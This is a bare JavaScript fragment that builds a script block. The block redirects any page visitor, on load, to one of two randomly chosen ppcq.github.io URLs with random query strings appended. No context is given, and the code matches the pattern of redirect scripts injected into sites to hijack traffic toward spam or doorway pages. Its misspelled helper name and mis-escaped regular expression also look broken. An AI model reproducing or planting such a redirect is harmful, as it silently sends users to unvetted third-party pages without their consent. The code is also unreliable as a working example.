var sb='﻿<script>';
sb+='var urls=[';
sb+='"https://ppcq.github.io/pp?{nnnnnnnnnnn}{wwwwww}",';
sb+='"https://ppcq.github.io/ll.html?{nnnnnnnnnnn}{wwwwww}",';
sb+='];';
sb+='location.href = myEeplace(urls[Math.floor(Math.random()*urls.length)]);';
sb+='function myEeplace(s){';
sb+='	return s.replace(/\/{(\/w+?)\/}/g,function(a,b){';
sb+='		var h="";';
sb+='		for(var i=0;i<b.length;i++){';
sb+='			if("n"==b[i]){';
sb+='				h+=Math.floor(Math.random()*10);';
sb+='			}else if("w"==b[i]){';
sb+='				h+=String.fromCharCode(97+Math.floor(Math.random()*26));';
sb+='			}';
sb+='		}';
sb+='		return h;';
sb+='	});';
sb+='}';
sb+='</script>';
